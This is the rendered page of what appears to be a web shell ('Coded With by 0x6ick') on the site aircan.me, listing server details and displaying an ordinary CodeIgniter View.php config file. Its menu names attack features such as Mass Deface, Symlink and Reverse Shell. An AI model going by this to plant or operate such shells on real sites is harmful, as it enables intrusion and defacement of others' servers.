Tul xxx Tul
User / IP
:
216.73.217.33
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
posuribia
/
app
/
Config
/
Viewing: View.php
<?php namespace Config; use CodeIgniter\Config\View as BaseView; use CodeIgniter\View\ViewDecoratorInterface; /** * @phpstan-type parser_callable (callable(mixed): mixed) * @phpstan-type parser_callable_string (callable(mixed): mixed)&string */ class View extends BaseView { /** * When false, the view method will clear the data between each * call. This keeps your data safe and ensures there is no accidental * leaking between calls, so you would need to explicitly pass the data * to each view. You might prefer to have the data stick around between * calls so that it is available to all views. If that is the case, * set $saveData to true. * * @var bool */ public $saveData = true; /** * Parser Filters map a filter name with any PHP callable. When the * Parser prepares a variable for display, it will chain it * through the filters in the order defined, inserting any parameters. * To prevent potential abuse, all filters MUST be defined here * in order for them to be available for use within the Parser. * * Examples: * { title|esc(js) } * { created_on|date(Y-m-d)|esc(attr) } * * @var array<string, string> * @phpstan-var array<string, parser_callable_string> */ public $filters = []; /** * Parser Plugins provide a way to extend the functionality provided * by the core Parser by creating aliases that will be replaced with * any callable. Can be single or tag pair. * * @var array<string, callable|list<string>|string> * @phpstan-var array<string, list<parser_callable_string>|parser_callable_string|parser_callable> */ public $plugins = []; /** * View Decorators are class methods that will be run in sequence to * have a chance to alter the generated output just prior to caching * the results. * * All classes must implement CodeIgniter\View\ViewDecoratorInterface * * @var list<class-string<ViewDecoratorInterface>> */ public array $decorators = []; }
Coded With 💗 by
0x6ick